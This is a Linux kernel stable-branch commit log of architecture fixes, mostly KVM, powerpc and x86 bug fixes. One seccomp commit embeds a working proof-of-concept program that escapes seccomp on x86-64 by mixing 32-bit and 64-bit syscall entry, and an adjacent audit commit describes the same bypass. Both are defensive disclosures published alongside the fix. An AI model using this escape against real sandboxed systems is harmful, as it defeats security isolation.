path: root/arch
2009-05-02  powerpc: Sanitize stack pointer in signal handling code  (Josh Boyer)
This has been backported to 2.6.28.x from commit efbda86098 in Linus' tree. On powerpc64 machines running 32-bit userspace, we can get garbage bits in the stack pointer passed into the kernel. Most places handle this correctly, but the signal handling code uses the passed value directly for allocating signal stack frames. This fixes the issue by introducing a get_clean_sp function that returns a sanitized stack pointer. For 32-bit tasks on a 64-bit kernel, the stack pointer is masked correctly. In all other cases, the stack pointer is simply returned. Additionally, we now pass an 'is_32' parameter to get_sigframe in order to get the properly sanitized stack. The callers are known to be 32-bit or 64-bit statically. Signed-off-by: Josh Boyer <jwboyer@linux.vnet.ibm.com> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
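A minimal sketch of the kind of helper described here, assuming the usual ppc64 convention that r1 holds the stack pointer (a sketch of the idea, not necessarily the exact upstream code):

    static inline unsigned long get_clean_sp(struct pt_regs *regs, int is_32)
    {
            if (is_32)
                    /* 32-bit task on a 64-bit kernel: the upper 32 bits
                     * of r1 may contain garbage, so mask them off */
                    return regs->gpr[1] & 0xffffffffUL;

            /* 64-bit task (or 32-bit kernel): use the value as-is */
            return regs->gpr[1];
    }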
2009-05-02  KVM: VMX: Flush volatile msrs before emulating rdmsr  (Avi Kivity)
(cherry picked from 516a1a7e9dc80358030fe01aabb3bedf882db9e2) Some msrs (notably MSR_KERNEL_GS_BASE) are held in the processor registers and need to be flushed to the vcpu structure before they can be read. This fixes cygwin longjmp() failure on Windows x64. Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: x86: fix LAPIC pending count calculation  (Marcelo Tosatti)
(cherry picked from b682b814e3cc340f905c14dff87ce8bdba7c5eba) Simplify LAPIC TMCCT calculation by using hrtimer provided function to query remaining time until expiration. Fixes host hang with nested ESX. Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Alexander Graf <agraf@suse.de> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: x86: disable kvmclock on non constant TSC hosts  (Marcelo Tosatti)
(cherry picked from abe6655dd699069b53bcccbc65b2717f60203b12) Currently this code path is causing us big trouble, and we won't have a decent patch in time. So, temporarily disable it. Signed-off-by: Glauber Costa <glommer@redhat.com> Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: PIT: fix i8254 pending count read  (Marcelo Tosatti)
(cherry picked from d2a8284e8fca9e2a938bee6cd074064d23864886) The count_load_time assignment is bogus: it's supposed to contain what its name says, the load time, not the expiration time. Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: MMU: handle large host sptes on invlpg/resync  (Marcelo Tosatti)
(cherry picked from 87917239204d67a316cb89751750f86c9ed3640b) The invlpg and sync walkers lack knowledge of large host sptes, descending to a non-existent pagetable level. Stop at the directory level in such a case. Fixes SMP Windows XP with hugepages. Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: MMU: check for present pdptr shadow page in walk_shadow  (Marcelo Tosatti)
(cherry picked from eb64f1e8cd5c3cae912db30a77d062367f7a11a6) walk_shadow assumes the caller verified validity of the pdptr pointer in question, which is not the case for the invlpg handler. Fixes oops during Solaris 10 install. Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: x86 emulator: Fix handling of VMMCALL instruction  (Amit Shah)
(cherry picked from fbce554e940a983d005e29849636d0ef54b3eb18) The VMMCALL instruction doesn't get recognised and isn't processed by the emulator. This is seen on an Intel host that tries to execute the VMMCALL instruction after a guest live migrates from an AMD host. Signed-off-by: Amit Shah <amit.shah@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: Fix cpuid iteration on multiple leaves per eac  (Nitin A Kamble)
(cherry picked from 0fdf8e59faa5c60e9d77c8e14abe3a0f8bfcf586) The code to traverse the cpuid data array list for counting types of leaves is currently broken. This patch fixes two things in it. 1. Set the first counting entry's flag KVM_CPUID_FLAG_STATE_READ_NEXT. Without it the code will never find a valid entry. 2. The stop condition in the for loop while looking for the next unflagged entry is also broken. It needs to stop when it finds one matching entry; in the case of a count of 1, that will be the same entry found in this iteration. Signed-Off-By: Nitin A Kamble <nitin.a.kamble@intel.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: Fix cpuid leaf 0xb loop termination  (Nitin A Kamble)
(cherry picked from 0853d2c1d849ef69884d2447d90d04007590b72b) For cpuid leaf 0xb the bits 8-15 in ECX register define the end of counting leaf. The previous code was using bits 0-7 for this purpose, which is a bug. Signed-off-by: Nitin A Kamble <nitin.a.kamble@intel.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: MMU: Fix aliased gfns treated as unaliased  (Izik Eidus)
(cherry picked from 2843099fee32a6020e1caa95c6026f28b5d43bff) Some areas of the kvm x86 mmu are using a gfn offset inside a slot without unaliasing the gfn first. This patch makes sure that the gfn will be unaliased, and adds gfn_to_memslot_unaliased() to avoid recomputing the unaliased gfn in case we already have it. Signed-off-by: Izik Eidus <ieidus@redhat.com> Acked-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: SVM: Set the 'busy' flag of the TR selector  (Amit Shah)
(cherry picked from c0d09828c870f90c6bc72070ada281568f89c63b) The busy flag of the TR selector is not set by the hardware. This breaks migration from amd hosts to intel hosts. Signed-off-by: Amit Shah <amit.shah@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: SVM: Set the 'g' bit of the cs selector for cross-vendor migration  (Amit Shah)
(cherry picked from 25022acc3dd5f0b54071c7ba7c371860f2971b52) The hardware does not set the 'g' bit of the cs selector and this breaks migration from amd hosts to intel hosts. Set this bit if the segment limit is beyond 1 MB. Signed-off-by: Amit Shah <amit.shah@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
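A sketch of the workaround as described (field and variable names are illustrative, not the exact upstream hunk):

    /* when reading the CS segment back out of the VMCB: AMD hardware
     * leaves the granularity bit clear, so reconstruct it from the limit */
    if (seg == VCPU_SREG_CS)
            var->g = var->limit > 0xfffff;  /* limit beyond 1 MB implies 4K granularity */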
2009-05-02  KVM: VMX: Move private memory slot position  (Sheng Yang)
(cherry picked from 6fe639792c7b8e462baeaac39ecc33541fd5da6e) PCI device assignment maps guest MMIO spaces as separate slots, so it is possible that a device has more than 2 MMIO spaces and overwrites the current private memslot. The patch moves the private memory slot to the top of the userspace-visible memory slots. Signed-off-by: Sheng Yang <sheng@linux.intel.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: MMU: Extend kvm_mmu_page->slot_bitmap size  (Sheng Yang)
(cherry picked from 291f26bc0f89518ad7ee3207c09eb8a743ac8fcc) Otherwise set_bit() for a private memory slot (above KVM_MEMORY_SLOTS) would corrupt memory on a 32-bit host. Signed-off-by: Sheng Yang <sheng@linux.intel.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
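The shape of the fix is simply to size the bitmap for the private slots as well (a sketch of the one-line change described here):

    /* in struct kvm_mmu_page: cover the private slots too, not only the
     * KVM_MEMORY_SLOTS user-visible ones, so set_bit() cannot overrun */
    DECLARE_BITMAP(slot_bitmap, KVM_MEMORY_SLOTS + KVM_PRIVATE_MEM_SLOTS);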
2009-05-02  KVM: call kvm_arch_vcpu_reset() instead of the kvm_x86_ops callback  (Gleb Natapov)
(cherry picked from 5f179287fa02723215eecf681d812b303c243973) Call kvm_arch_vcpu_reset() instead of using the arch callback directly. The function does additional things. Signed-off-by: Gleb Natapov <gleb@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  KVM: x86: Reset pending/inject NMI state on CPU reset  (Jan Kiszka)
(cherry picked from 448fa4a9c5dbc6941dd19ed09692c588d815bb06) CPU reset invalidates pending or already injected NMIs, therefore reset the related state variables. Based on original patch by Gleb Natapov. Signed-off-by: Gleb Natapov <gleb@redhat.com> Signed-off-by: Jan Kiszka <jan.kiszka@siemens.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  powerpc: Fix data-corrupting bug in __futex_atomic_op  (Paul Mackerras)
upstream commit: 306a82881b14d950d59e0b59a55093a07d82aa9a Richard Henderson pointed out that the powerpc __futex_atomic_op has a bug: it will write the wrong value if the stwcx. fails and it has to retry the lwarx/stwcx. loop, since 'oparg' will have been overwritten by the result from the first time around the loop. This happens because it uses the same register for 'oparg' (an input) as it uses for the result. This fixes it by using separate registers for 'oparg' and 'ret'. Cc: stable@kernel.org Signed-off-by: Paul Mackerras <paulus@samba.org> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  x86, setup: mark %esi as clobbered in E820 BIOS call  (Michael K. Johnson)
upstream commit: 01522df346f846906eaf6ca57148641476209909 Jordan Hargrave diagnosed a BIOS clobbering %esi in the E820 call. That particular BIOS has been fixed, but there is a possibility that this is responsible for other occasional reports of early boot failure, and it does not hurt to add %esi to the clobbers. -stable candidate patch. Cc: Justin Forbes <jmforbes@linuxtx.org> Signed-off-by: Michael K Johnson <johnsonm@rpath.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
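Illustratively, the change amounts to listing "esi" in the clobber list of the E820 inline asm; a simplified sketch (variable names follow the surrounding boot code, the real statement has the full set of inputs and outputs):

    asm("int $0x15; setc %0"
        : "=d" (err), "+b" (next), "=a" (id), "+c" (size), "=m" (*desc)
        : "D" (desc), "d" (SMAP), "a" (0xe820)
        : "esi");               /* some BIOSes trash %esi across the call */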
2009-05-02  x86: mtrr: don't modify RdDram/WrDram bits of fixed MTRRs  (Andreas Herrmann)
upstream commit: 3ff42da5048649503e343a32be37b14a6a4e8aaf Impact: bug fix + BIOS workaround

BIOS is expected to clear the SYSCFG[MtrrFixDramModEn] bit on AMD CPUs after fixed MTRRs are configured. Some BIOSes do not clear SYSCFG[MtrrFixDramModEn] on the BP (and on the APs). This can lead to confusion in Linux when this bit is not cleared on the BP but cleared on the APs. A consequence of this is that the saved fixed-MTRR state (from the BP) differs from the fixed-MTRRs of the APs -- because RdDram/WrDram bits are read as zero when SYSCFG[MtrrFixDramModEn] is cleared -- and Linux tries to sync the fixed-MTRR state from the BP to the APs. This implies that Linux sets SYSCFG[MtrrFixDramEn] and activates those bits. More important is that (some) systems change these bits in SMM when ACPI is enabled. Hence it is racy if Linux modifies RdMem/WrMem bits, too.

(1) The patch modifies an old fix from Bernhard Kaindl to get suspend/resume working on some Acer laptops. Bernhard's patch tried to sync RdMem/WrMem bits of fixed MTRR registers and that helped on those old laptops. (Don't ask me why -- can't test it myself). But this old problem was not the motivation for the patch. (See http://lkml.org/lkml/2007/4/3/110)

(2) The more important effect is to fix issues on some more current systems. On those systems Linux panics or just freezes, see http://bugzilla.kernel.org/show_bug.cgi?id=11541 (and also duplicates of this bug: http://bugzilla.kernel.org/show_bug.cgi?id=11737 http://bugzilla.kernel.org/show_bug.cgi?id=11714). The affected systems boot only using acpi=ht, acpi=off or when the kernel is built with CONFIG_MTRR=n. The acpi options prevent full enablement of ACPI. Obviously when ACPI is enabled the BIOS/SMM modifies RdMem/WrMem bits. When CONFIG_MTRR=y Linux also accesses and modifies those bits when it needs to sync fixed-MTRRs across cores (Bernhard's fix, see (1)). How do you synchronize that? You can't. As a consequence Linux shouldn't touch those bits at all (the rationale is in AMD's BKDGs, which recommend clearing the bit that makes RdMem/WrMem accessible). This is the purpose of this patch. And (so far) this suffices to fix (1) and (2).

I suggest not touching the RdDram/WrDram bits of fixed MTRRs and SYSCFG[MtrrFixDramEn], and clearing SYSCFG[MtrrFixDramModEn], as suggested by the AMD K8 and AMD family 10h/11h BKDGs. BIOS is expected to do this anyway. This should keep Linux and SMM from treading on each other's toes ...

Signed-off-by: Andreas Herrmann <andreas.herrmann3@amd.com> Cc: trenn@suse.de Cc: Yinghai Lu <yinghai@kernel.org> LKML-Reference: <20090312163937.GH20716@alberich.amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02  x86, PAT, PCI: Change vma prot in pci_mmap to reflect inherited prot  (Venkatesh Pallipadi)
upstream commit: 9cdec049389ce2c324fd1ec508a71528a27d4a07 While looking at the issue in the thread http://marc.info/?l=dri-devel&m=123606627824556&w=2 we noticed a bug in the PCI PAT code and memory type setting. The PCI mmap code did not set the proper protection in the vma when it inherited protection in reserve_memtype. This bug only affects the case where there exists a WC mapping before X does an mmap with the /proc or /sys pci interface. This will cause X userlevel mmap from /proc or /sysfs to fail on fork. Reported-by: Kevin Winchester <kjwinchester@gmail.com> Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com> Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com> Cc: Jesse Barnes <jbarnes@virtuousgeek.org> Cc: Dave Airlie <airlied@redhat.com> LKML-Reference: <20090323190720.GA16831@linux-os.sc.intel.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23  powerpc: Remove extra semicolon in fsl_soc.c  (Johns Daniel)
TSEC/MDIO will not work with older device trees because of a semicolon at the end of a macro resulting in an empty for loop body. This fix only applies to 2.6.28; this code is gone in 2.6.29, according to Grant Likely! Signed-off-by: Johns Daniel <johns.daniel@gmail.com> Acked-by: Grant Likely <grant.likely@secretlab.ca> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23  S390: __div64_31 broken for CONFIG_MARCH_G5  (Martin Schwidefsky)
commit 4fa81ed27781a12f6303b9263056635ae74e3e21 upstream. The implementation of __div64_31 for G5 machines is broken. The comments in __div64_31 are correct, only the code does not do what the comments say. The part "If the remainder has overflown subtract base and increase the quotient" is only partially realized, the base is subtracted correctly but the quotient is only increased if the dividend had the last bit set. Using the correct instruction fixes the problem. Reported-by: Frans Pop <elendil@planet.nl> Tested-by: Frans Pop <elendil@planet.nl> Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23  Fix misreporting of #cores as #hyperthreads for Q9550  (Joe Korty)
For the Q9550, in x86_64 mode, /proc/cpuinfo mistakenly thinks the #cores present is the #hyperthreads present. i386 mode was not examined but is assumed to have the same problem. A backport of the following three 2.6.29-rc1 patches fixes the problem:

    066941bd4eeb159307a5d7d795100d0887c00442: [PATCH] x86: unmask CPUID levels on Intel CPUs
    99fb4d349db7e7dacb2099c5cc320a9e2d31c1ef: [PATCH] x86: unmask CPUID levels on Intel CPUs, fix
    bdf21a49bab28f0d9613e8d8724ef9c9168b61b9: [PATCH] x86: add MSR_IA32_MISC_ENABLE bits to <asm/msr-index.h>

From the first patch: "If the CPUID limit bit in MSR_IA32_MISC_ENABLE is set, clear it to make all CPUID information available. This is required for some features to work, in particular XSAVE." Originally-Developed-by: H. Peter Anvin <hpa@linux.intel.com> Backported-by: Joe Korty <joe.korty@ccur.com> Signed-off-by: Joe Korty <joe.korty@ccur.com> Cc: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
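The heart of the backported change is clearing that CPUID limit bit during early Intel CPU setup; schematically (a sketch using the MSR_IA32_MISC_ENABLE_LIMIT_CPUID constant added by the third patch, not the verbatim hunk):

    u64 misc_enable;

    rdmsrl(MSR_IA32_MISC_ENABLE, misc_enable);
    if (misc_enable & MSR_IA32_MISC_ENABLE_LIMIT_CPUID) {
            misc_enable &= ~MSR_IA32_MISC_ENABLE_LIMIT_CPUID;
            wrmsrl(MSR_IA32_MISC_ENABLE, misc_enable);
            /* re-read the now-unmasked maximum CPUID level */
            c->cpuid_level = cpuid_eax(0);
    }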
2009-03-23  Build fix for __early_pfn_to_nid() undefined link error  (Tony Luck)
commit 334f85b647bc46ff4d27ace55aa65f44d6a2f4db upstream. ia64 only defines __early_pfn_to_nid() for SPARSEMEM && NUMA configurations, so the recent: commit: f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 mm: clean up for early_pfn_to_nid() ends up with some link problems for certain configuration files. Fix arch/ia64/Kconfig to only define HAVE_ARCH_EARLY_PFN_TO_NID in the cases where we do provide this function. Signed-off-by: Tony Luck <tony.luck@intel.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  MIPS: compat: Implement is_compat_task.  (Ralf Baechle)
commit 4302e5d53b9166d45317e3ddf0a7a9dab3efd43b upstream. This is a build fix required after "x86-64: seccomp: fix 32/64 syscall hole" (commit 5b1017404aea6d2e552e991b3fd814d839e9cd67). MIPS doesn't have the issue that was fixed for x86-64 by that patch. This also doesn't solve the N32 issue which is that N32 seccomp processes will be treated as non-compat processes thus only have access to N64 syscalls. Signed-off-by: Ralf Baechle <ralf@linux-mips.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  ARM: Add i2c_board_info for RiscPC PCF8583  (Russell King)
commit 531660ef5604c75de6fdead9da1304051af17c09 upstream Add the necessary i2c_board_info structure to fix the lack of PCF8583 RTC on RiscPC. Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk> Signed-off-by: Jean Delvare <khali@linux-fr.org> Cc: Alessandro Zummo <a.zummo@towertech.it> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  x86: fix math_emu register frame access  (Tejun Heo)
commit d315760ffa261c15ff92699ac6f514112543d7ca upstream. do_device_not_available() is the handler for #NM and it declares that it takes an unsigned long and calls math_emu(), which takes a long argument and surprisingly expects that the stack frame starting at the zero argument would match struct math_emu_info, which isn't true regardless of configuration in the current code. This patch makes do_device_not_available() take struct pt_regs like other exception handlers, initialize struct math_emu_info with a pointer to it, and pass a pointer to the math_emu_info to math_emulate() like normal C functions do. This way, unless gcc makes a copy of struct pt_regs in do_device_not_available(), the register frame is correctly accessed regardless of kernel configuration or compiler used. This doesn't fix all math_emu problems but it at least gets it somewhat working. Signed-off-by: Tejun Heo <tj@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  x86: math_emu info cleanup  (Tejun Heo)
commit ae6af41f5a4841f06eb92bc86ad020ad44ae2a30 upstream. Impact: cleanup * Come on, struct info? s/struct info/struct math_emu_info/ * Use struct pt_regs and kernel_vm86_regs instead of defining its own register frame structure. Signed-off-by: Tejun Heo <tj@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  x86, hpet: fix for LS21 + HPET = boot hang  (john stultz)
commit b13e24644c138d0ddbc451403c30a96b09bfd556 upstream. Between 2.6.23 and 2.6.24-rc1 a change was made that broke IBM LS21 systems that had the HPET enabled in the BIOS, resulting in boot hangs for x86_64. Specifically commit b8ce33590687888ebb900d09557b8807c4539022, which merges the i386 and x86_64 HPET code.

Prior to this commit, when we setup the HPET timers in x86_64, we did the following:

    hpet_writel(HPET_TN_ENABLE | HPET_TN_PERIODIC | HPET_TN_SETVAL |
                HPET_TN_32BIT, HPET_T0_CFG);

However after the i386/x86_64 HPET merge, we do the following:

    cfg = hpet_readl(HPET_Tn_CFG(timer));
    cfg |= HPET_TN_ENABLE | HPET_TN_PERIODIC |
           HPET_TN_SETVAL | HPET_TN_32BIT;
    hpet_writel(cfg, HPET_Tn_CFG(timer));

However on LS21s with HPET enabled in the BIOS, the HPET_T0_CFG register boots with Level triggered interrupts (HPET_TN_LEVEL) enabled. This causes the periodic interrupt to be not so periodic, and that results in the boot time hang I reported earlier in the delay calibration.

My fix: Always disable HPET_TN_LEVEL when setting up periodic mode.

Signed-off-by: John Stultz <johnstul@us.ibm.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
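The shape of that fix is to mask off HPET_TN_LEVEL before OR-ing in the periodic-mode bits (a sketch of the idea, not the verbatim hunk):

    cfg = hpet_readl(HPET_Tn_CFG(timer));
    /* force edge-triggered interrupts: some BIOSes (e.g. on the LS21)
     * leave HPET_TN_LEVEL set, which breaks the periodic tick */
    cfg &= ~HPET_TN_LEVEL;
    cfg |= HPET_TN_ENABLE | HPET_TN_PERIODIC |
           HPET_TN_SETVAL | HPET_TN_32BIT;
    hpet_writel(cfg, HPET_Tn_CFG(timer));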
2009-03-16  x86/paravirt: make arch_flush_lazy_mmu/cpu disable preemption  (Jeremy Fitzhardinge)
commit d85cf93da66977dbc645352be1b2084a659d8a0b upstream. Impact: avoid access to percpu vars in preemptible context These functions are intended to be used whenever there's the possibility that there's some stale state which is going to be overwritten with a queued update, or to force a state change when we may be in lazy mode. Either way, we could end up calling them with preemption enabled, so wrap the functions in their own little preempt-disable section so they can be safely called in any context (though preemption should never be enabled if we're actually in a lazy state). (Move out of line to avoid #include dependencies.) Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Signed-off-by: Thomas Gleixner <tglx@linutronix.de> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
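A sketch of what that wrapping looks like for the MMU flavour, using the existing paravirt helpers (the CPU flavour is analogous; not the verbatim upstream hunk):

    void arch_flush_lazy_mmu_mode(void)
    {
            preempt_disable();

            if (paravirt_get_lazy_mode() == PARAVIRT_LAZY_MMU) {
                    /* flush queued updates by leaving and re-entering lazy mode */
                    arch_leave_lazy_mmu_mode();
                    arch_enter_lazy_mmu_mode();
            }

            preempt_enable();
    }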
2009-03-16  powerpc: Fix load/store float double alignment handler  (Michael Neuling)
commit 49f297f8df9adb797334155470ea9ca68bdb041e upstream. When we introduced VSX, we changed the way FPRs are stored in the thread_struct. Unfortunately we missed the load/store float double alignment handler code when updating how we access FPRs in the thread_struct. Below fixes this and merges the little/big endian case. Signed-off-by: Michael Neuling <mikey@neuling.org> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  xen: disable interrupts early, as start_kernel expects  (Jeremy Fitzhardinge)
commit 55d8085671863fe4ee6a17b7814bd38180a44e1d upstream. This avoids a lockdep warning from:

    if (DEBUG_LOCKS_WARN_ON(unlikely(!early_boot_irqs_enabled)))
            return;

in trace_hardirqs_on_caller(). Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Cc: Mark McLoughlin <markmc@redhat.com> Cc: Xen-devel <xen-devel@lists.xensource.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  x86-64: syscall-audit: fix 32/64 syscall hole  (Roland McGrath)
commit ccbe495caa5e604b04d5a31d7459a6f6a76a756c upstream. On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process can make a 32-bit system call with int $0x80. In both these cases, audit_syscall_entry() will use the wrong system call number table and the wrong system call argument registers. This could be used to circumvent a syscall audit configuration that filters based on the syscall numbers or argument details. Signed-off-by: Roland McGrath <roland@redhat.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  x86-64: seccomp: fix 32/64 syscall hole  (Roland McGrath)
commit 5b1017404aea6d2e552e991b3fd814d839e9cd67 upstream. On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process can make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit:

    /* test case for seccomp circumvention on x86-64

       There are two failure modes: compile with -m64 or compile with -m32.

       The -m64 case is the worst one, because it does "chmod 777 ." (could
       be any chmod call).  The -m32 case demonstrates it was able to do
       stat(), which can glean information but not harm anything directly.

       A buggy kernel will let the test do something, print, and exit 1; a
       fixed kernel will make it exit with SIGKILL before it does anything. */

    #define _GNU_SOURCE
    #include <assert.h>
    #include <inttypes.h>
    #include <stdio.h>
    #include <linux/prctl.h>
    #include <sys/stat.h>
    #include <unistd.h>
    #include <asm/unistd.h>

    int main (int argc, char **argv)
    {
      char buf[100];
      static const char dot[] = ".";
      long ret;
      unsigned st[24];

      if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
        perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

    #ifdef __x86_64__
      assert ((uintptr_t) dot < (1UL << 32));
      asm ("int $0x80 # %0 <- %1(%2 %3)"
           : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      ret = snprintf (buf, sizeof buf,
                      "result %ld (check mode on .!)\n", ret);
    #elif defined __i386__
      asm (".code32\n"
           "pushl %%cs\n"
           "pushl $2f\n"
           "ljmpl $0x33, $1f\n"
           ".code64\n"
           "1: syscall # %0 <- %1(%2 %3)\n"
           "lretl\n"
           ".code32\n"
           "2:"
           : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      if (ret == 0)
        ret = snprintf (buf, sizeof buf,
                        "stat . -> st_uid=%u\n", st[7]);
      else
        ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
    #else
    # error "not this one"
    #endif

      write (1, buf, ret);
      syscall (__NR_exit, 1);
      return 2;
    }

Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
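The distinction the fix relies on, expressed as a hypothetical helper for illustration (the real change edits the seccomp path, and its companion patch the audit path, directly):

    static inline int syscall_is_compat(void)
    {
            /* wrong test: TIF_IA32 records how the task was created    */
            /*     return test_thread_flag(TIF_IA32);                   */

            /* right test: TS_COMPAT records how *this* syscall entered */
            return current_thread_info()->status & TS_COMPAT;
    }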
2009-03-16  x86-64: fix int $0x80 -ENOSYS return  (Roland McGrath)
commit c09249f8d1b84344eca882547afdbffee8c09d14 upstream. One of my past fixes to this code introduced a different new bug. When using 32-bit "int $0x80" entry for a bogus syscall number, the return value is not correctly set to -ENOSYS. This only happens when neither syscall-audit nor syscall tracing is enabled (i.e., never seen if auditd ever started). Test program:

    /* gcc -o int80-badsys -m32 -g int80-badsys.c
       Run on x86-64 kernel.
       Note to reproduce the bug you need auditd never to have started. */

    #include <errno.h>
    #include <stdio.h>

    int main (void)
    {
      long res;
      asm ("int $0x80" : "=a" (res) : "0" (99999));
      printf ("bad syscall returns %ld\n", res);
      return res != -ENOSYS;
    }

The fix makes the int $0x80 path match the sysenter and syscall paths. Reported-by: Dmitry V. Levin <ldv@altlinux.org> Signed-off-by: Roland McGrath <roland@redhat.com> Cc: Chuck Ebbert <cebbert@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  x86: tone down mtrr_trim_uncached_memory() warning  (Ingo Molnar)
commit bf3647c44bc76c43c4b2ebb4c37a559e899ac70e upstream. kerneloops.org is reporting a lot of these warnings that are due to vmware not setting up any MTRRs for emulated CPUs:

    | Reported 709 times (14696 total reports)
    | BIOS bug (often in VMWare) where the MTRR's are set up incorrectly
    | or not at all
    |
    | This warning was last seen in version 2.6.29-rc2-git1, and first
    | seen in 2.6.24.
    |
    | More info:
    | http://www.kerneloops.org/searchweek.php?search=mtrr_trim_uncached_memory

Keep a one-liner KERN_INFO about it - so that we have some notice if empty MTRRs are caused by native hardware/BIOS weirdness. Signed-off-by: Ingo Molnar <mingo@elte.hu> Cc: Chuck Ebbert <cebbert@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  x86: add Dell XPS710 reboot quirk  (Leann Ogasawara)
